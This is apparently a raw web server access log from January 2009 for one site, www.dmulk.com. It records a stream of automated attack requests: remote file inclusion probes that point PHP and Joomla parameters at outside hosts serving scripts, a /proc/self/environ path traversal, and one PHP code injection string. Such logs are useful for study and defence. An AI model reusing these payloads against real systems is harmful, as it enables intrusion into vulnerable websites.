195.50.133.210 - - [04/Jan/2009:10:26:25 -0800] "GET /logs/access_080715.log//modules/Forums/admin/admin_styles.php?phpbb_root_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
205.231.144.152 - - [04/Jan/2009:10:26:28 -0800] "GET /logs/access_080112.log//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://www.lazar.ru/manager/processors/min.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.204.231.202 - - [04/Jan/2009:10:26:35 -0800] "GET //administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.176.226.164 - - [04/Jan/2009:10:26:56 -0800] "GET /logs/access_080720.log//contenido.php?sec=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
81.176.226.164 - - [04/Jan/2009:10:26:56 -0800] "GET /logs/access_081014.log//contenido.php?sec=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
81.176.226.164 - - [04/Jan/2009:10:26:56 -0800] "GET /logs//contenido.php?sec=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
81.176.226.164 - - [04/Jan/2009:10:26:56 -0800] "GET /contenido.php?sec=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
65.18.157.227 - - [04/Jan/2009:10:26:57 -0800] "GET /logs/index.php?seite=http://www.novoftp.xpg.com.br/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
65.18.157.227 - - [04/Jan/2009:10:26:57 -0800] "GET /logs/access_071111.log/index.php?seite=http://www.novoftp.xpg.com.br/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.173.117 - - [04/Jan/2009:10:26:58 -0800] "GET /logs/access_080901.log/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://www.lazar.ru/manager/processors/test.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.18.157.227 - - [04/Jan/2009:10:26:58 -0800] "GET /index.php?seite=http://www.novoftp.xpg.com.br/id1.txt?? HTTP/1.1" 200 94703 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.173.117 - - [04/Jan/2009:10:26:59 -0800] "GET /index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://www.lazar.ru/manager/processors/test.txt? HTTP/1.1" 200 95281 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.173.117 - - [04/Jan/2009:10:27:01 -0800] "GET /logs/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://www.lazar.ru/manager/processors/test.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.18.157.227 - - [04/Jan/2009:10:27:02 -0800] "GET /logs/access_071024.log/index.php?seite=http://www.novoftp.xpg.com.br/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.235.245.121 - - [04/Jan/2009:10:27:04 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.235.245.121 - - [04/Jan/2009:10:27:04 -0800] "GET /logs/access_081114.log%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.235.245.121 - - [04/Jan/2009:10:27:05 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.110.174.10 - - [04/Jan/2009:10:27:08 -0800] "GET /logs/access_080928.log//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.manuelymar.net/rtve/uploads/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
78.110.174.10 - - [04/Jan/2009:10:27:08 -0800] "GET /ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.manuelymar.net/rtve/uploads/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
78.110.174.10 - - [04/Jan/2009:10:27:08 -0800] "GET /logs//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.manuelymar.net/rtve/uploads/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.234.200.132 - - [04/Jan/2009:10:27:13 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://josipanicic.freelinuxhost.com/jembut/index/idfe.txt?? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
200.234.200.132 - - [04/Jan/2009:10:27:13 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://josipanicic.freelinuxhost.com/jembut/index/idfe.txt?? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
200.234.200.132 - - [04/Jan/2009:10:27:13 -0800] "GET /logs/access_081016.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://josipanicic.freelinuxhost.com/jembut/index/idfe.txt?? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
64.38.51.98 - - [04/Jan/2009:10:27:15 -0800] "GET /logs/access_081114.log%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.tradeadvantage.com/images/bo.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
78.110.174.10 - - [04/Jan/2009:10:27:16 -0800] "GET /logs/access_080702.log//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.manuelymar.net/rtve/uploads/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
94.23.3.220 - - [04/Jan/2009:10:27:31 -0800] "GET /logs/access_080714.log//main.php?page=http://www.csjh.tpc.edu.tw/~sw/board/idbr.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
94.23.3.220 - - [04/Jan/2009:10:27:31 -0800] "GET /main.php?page=http://www.csjh.tpc.edu.tw/~sw/board/idbr.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
94.23.3.220 - - [04/Jan/2009:10:27:32 -0800] "GET /logs//main.php?page=http://www.csjh.tpc.edu.tw/~sw/board/idbr.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.142.211.198 - - [04/Jan/2009:10:27:42 -0800] "GET /logs/access_080905.log/errors.php?error=http://forum.muenic.de//karte/bacokid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
148.245.102.115 - - [04/Jan/2009:10:27:43 -0800] "GET /logs/access_080903.log//index.php?DOCUMENT_ROOT=http://h1.ripway.com/kurbang/idV6.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
148.245.102.115 - - [04/Jan/2009:10:27:43 -0800] "GET /logs//index.php?DOCUMENT_ROOT=http://h1.ripway.com/kurbang/idV6.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
148.245.102.115 - - [04/Jan/2009:10:27:43 -0800] "GET /index.php?DOCUMENT_ROOT=http://h1.ripway.com/kurbang/idV6.txt?? HTTP/1.1" 200 94789 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
205.231.144.152 - - [04/Jan/2009:10:27:51 -0800] "GET /logs/access_080118.log//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://www.lazar.ru/manager/processors/min.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
78.110.174.10 - - [04/Jan/2009:10:27:54 -0800] "GET /logs/access_081114.log%20//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.manuelymar.net/rtve/uploads/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.18.157.227 - - [04/Jan/2009:10:28:01 -0800] "GET /logs/access_071111.log%20%20/index.php?seite=http://www.novoftp.xpg.com.br/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
65.18.157.227 - - [04/Jan/2009:10:28:01 -0800] "GET /logs/access_071024.log%20%20/index.php?seite=http://www.novoftp.xpg.com.br/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
205.231.144.152 - - [04/Jan/2009:10:28:02 -0800] "GET /logs/access_080112.log//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://www.lazar.ru/manager/processors/min.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:10:28:07 -0800] "GET /logs/access_080427.log//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:10:28:07 -0800] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:10:28:07 -0800] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
87.6.92.159 - - [04/Jan/2009:10:28:10 -0800] "GET /logs/access_080903.log//index.php?DOCUMENT_ROOT=http://dark912.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
87.6.92.159 - - [04/Jan/2009:10:28:10 -0800] "GET /logs//index.php?DOCUMENT_ROOT=http://dark912.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
87.6.92.159 - - [04/Jan/2009:10:28:11 -0800] "GET /index.php?DOCUMENT_ROOT=http://dark912.altervista.org/id.txt? HTTP/1.1" 200 94747 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:10:28:15 -0800] "GET /logs/access_080427.log//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:10:28:15 -0800] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:10:28:15 -0800] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
148.245.102.115 - - [04/Jan/2009:10:28:22 -0800] "GET /logs/access_081108.log//index.php?DOCUMENT_ROOT=http://h1.ripway.com/kurbang/idV6.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
202.60.67.10 - - [04/Jan/2009:10:28:24 -0800] "GET /logs/access_081125.log//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://mhasbi.com/safe.cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
202.60.67.10 - - [04/Jan/2009:10:28:24 -0800] "GET /logs/access_081125.log//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://mhasbi.com/safe.cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
202.60.67.10 - - [04/Jan/2009:10:28:24 -0800] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://mhasbi.com/safe.cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
202.60.67.10 - - [04/Jan/2009:10:28:24 -0800] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://mhasbi.com/safe.cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:10:28:27 -0800] "GET /logs/access_080427.log//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:10:28:27 -0800] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:10:28:33 -0800] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
91.142.211.198 - - [04/Jan/2009:10:28:34 -0800] "GET /logs/access_081128.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://portal.morpace.com/portal/demo/templates/id5.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.142.211.198 - - [04/Jan/2009:10:28:43 -0800] "GET /logs/access_080427.log/lostpasswd.php?env[include_prefix]=http://portal.morpace.com/portal/demo/templates/id5.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.142.211.198 - - [04/Jan/2009:10:28:43 -0800] "GET /lostpasswd.php?env[include_prefix]=http://portal.morpace.com/portal/demo/templates/id5.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.142.211.198 - - [04/Jan/2009:10:28:43 -0800] "GET /logs/lostpasswd.php?env[include_prefix]=http://portal.morpace.com/portal/demo/templates/id5.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
148.245.102.115 - - [04/Jan/2009:10:28:47 -0800] "GET /logs/access_080903.log//index.php?DOCUMENT_ROOT=http://h1.ripway.com/kurbang/idV6.txt?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
148.245.102.115 - - [04/Jan/2009:10:28:47 -0800] "GET /logs//index.php?DOCUMENT_ROOT=http://h1.ripway.com/kurbang/idV6.txt?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
148.245.102.115 - - [04/Jan/2009:10:28:47 -0800] "GET /index.php?DOCUMENT_ROOT=http://h1.ripway.com/kurbang/idV6.txt?? HTTP/1.1" 200 94789 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
200.198.92.34 - - [04/Jan/2009:10:28:58 -0800] "GET /logs/access_080621.log//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.caverna.kit.net/z1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
87.6.92.159 - - [04/Jan/2009:10:29:00 -0800] "GET /logs/access_081108.log//index.php?DOCUMENT_ROOT=http://dark912.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:10:29:06 -0800] "GET /logs/access_080621.log//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:10:29:07 -0800] "GET /logs/access_080621.log//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
211.235.245.121 - - [04/Jan/2009:10:29:19 -0800] "GET /errors.php?error=http://www.stormpages.com/benu/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
211.235.245.121 - - [04/Jan/2009:10:29:19 -0800] "GET /logs/access_080828.log/errors.php?error=http://www.stormpages.com/benu/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
211.235.245.121 - - [04/Jan/2009:10:29:19 -0800] "GET /logs/errors.php?error=http://www.stormpages.com/benu/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
81.176.226.164 - - [04/Jan/2009:10:29:23 -0800] "GET /logs/access.log//contenido.php?sec=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
81.176.226.164 - - [04/Jan/2009:10:29:23 -0800] "GET /logs/access_080714.log//contenido.php?sec=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
148.245.102.115 - - [04/Jan/2009:10:29:32 -0800] "GET /logs/access_081108.log//index.php?DOCUMENT_ROOT=http://h1.ripway.com/kurbang/idV6.txt?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
84.21.71.133 - - [04/Jan/2009:10:29:33 -0800] "GET /logs/access_080903.log///?DOCUMENT_ROOT=http://www.geocities.com/sijabirong/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:10:29:37 -0800] "GET /logs/access_080621.log//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
211.235.245.121 - - [04/Jan/2009:10:29:40 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://josipanicic.freelinuxhost.com/jembut/index/idfe.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
67.107.47.80 - - [04/Jan/2009:10:29:40 -0800] "GET /logs/access_080613.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://portal.morpace.com/portal/demo/templates/id5.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.235.245.121 - - [04/Jan/2009:10:29:40 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://josipanicic.freelinuxhost.com/jembut/index/idfe.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
211.235.245.121 - - [04/Jan/2009:10:29:40 -0800] "GET /logs/access_081016.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://josipanicic.freelinuxhost.com/jembut/index/idfe.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
74.213.164.118 - - [04/Jan/2009:10:29:40 -0800] "GET /logs/access_080913.log//index.php?content=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.213.164.118 - - [04/Jan/2009:10:29:41 -0800] "GET /index.php?content=http://www.107.getplex.com/bbs/id? HTTP/1.1" 200 94682 "-" "libwww-perl/5.805" "www.dmulk.com"
74.213.164.118 - - [04/Jan/2009:10:29:42 -0800] "GET /logs//index.php?content=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.203.196.50 - - [04/Jan/2009:10:29:51 -0800] "GET /logs/access_081114.log%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.ss-safety.co.kr/kboard/perkosa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.196.5.189 - - [04/Jan/2009:10:29:55 -0800] "GET /logs/access_080121.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.alternativesud.com/ressources/cms/modules/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.213.164.118 - - [04/Jan/2009:10:29:58 -0800] "GET /logs/access_080806.log//index.php?content=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.235.245.121 - - [04/Jan/2009:10:30:01 -0800] "GET /logs/access_081016.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.21.71.133 - - [04/Jan/2009:10:30:02 -0800] "GET /logs/access_081108.log///?DOCUMENT_ROOT=http://www.geocities.com/sijabirong/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.235.245.121 - - [04/Jan/2009:10:30:10 -0800] "GET /logs/access_081002.log/errors.php?error=http://www.stormpages.com/benu/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
211.235.245.121 - - [04/Jan/2009:10:30:15 -0800] "GET /logs/access_081022.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.234.200.132 - - [04/Jan/2009:10:30:27 -0800] "GET /logs/access_081022.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://josipanicic.freelinuxhost.com/jembut/index/idfe.txt?? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
84.21.71.133 - - [04/Jan/2009:10:30:38 -0800] "GET /logs//index.php?DOCUMENT_ROOT=http://h1.ripway.com/kurbang/idV6.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
84.21.71.133 - - [04/Jan/2009:10:30:40 -0800] "GET /index.php?DOCUMENT_ROOT=http://h1.ripway.com/kurbang/idV6.txt?? HTTP/1.1" 200 94757 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
84.21.71.133 - - [04/Jan/2009:10:30:43 -0800] "GET /logs/access_080903.log//index.php?DOCUMENT_ROOT=http://www.geocities.com/sijabirong/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.21.71.133 - - [04/Jan/2009:10:30:53 -0800] "GET /logs/access_080903.log//index.php?DOCUMENT_ROOT=http://h1.ripway.com/kurbang/idV6.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
202.60.67.10 - - [04/Jan/2009:10:31:11 -0800] "GET /logs/access_080510.log//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://mhasbi.com/safe.cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
202.60.67.10 - - [04/Jan/2009:10:31:12 -0800] "GET /logs/access_080510.log//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://mhasbi.com/safe.cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
211.235.245.121 - - [04/Jan/2009:10:31:13 -0800] "GET /logs/access_080828.log/errors.php?error=http://www.stormpages.com/benu/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
211.235.245.121 - - [04/Jan/2009:10:31:13 -0800] "GET /errors.php?error=http://www.stormpages.com/benu/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
211.235.245.121 - - [04/Jan/2009:10:31:13 -0800] "GET /logs/errors.php?error=http://www.stormpages.com/benu/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
84.21.71.133 - - [04/Jan/2009:10:31:16 -0800] "GET /logs/access_081108.log//index.php?DOCUMENT_ROOT=http://www.geocities.com/sijabirong/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.141.37.54 - - [04/Jan/2009:10:31:33 -0800] "GET /logs/access_081125.log//administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://brant.3x.ro/test.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.8.172.68 - - [04/Jan/2009:10:31:40 -0800] "GET /logs/access_080214.log//?mosConfig_absolute_path=http://conexionw.com/.../.thumb/image.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
211.235.245.121 - - [04/Jan/2009:10:31:42 -0800] "GET /logs/access_081002.log/errors.php?error=http://www.stormpages.com/benu/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com" 91.142.211.198 - - [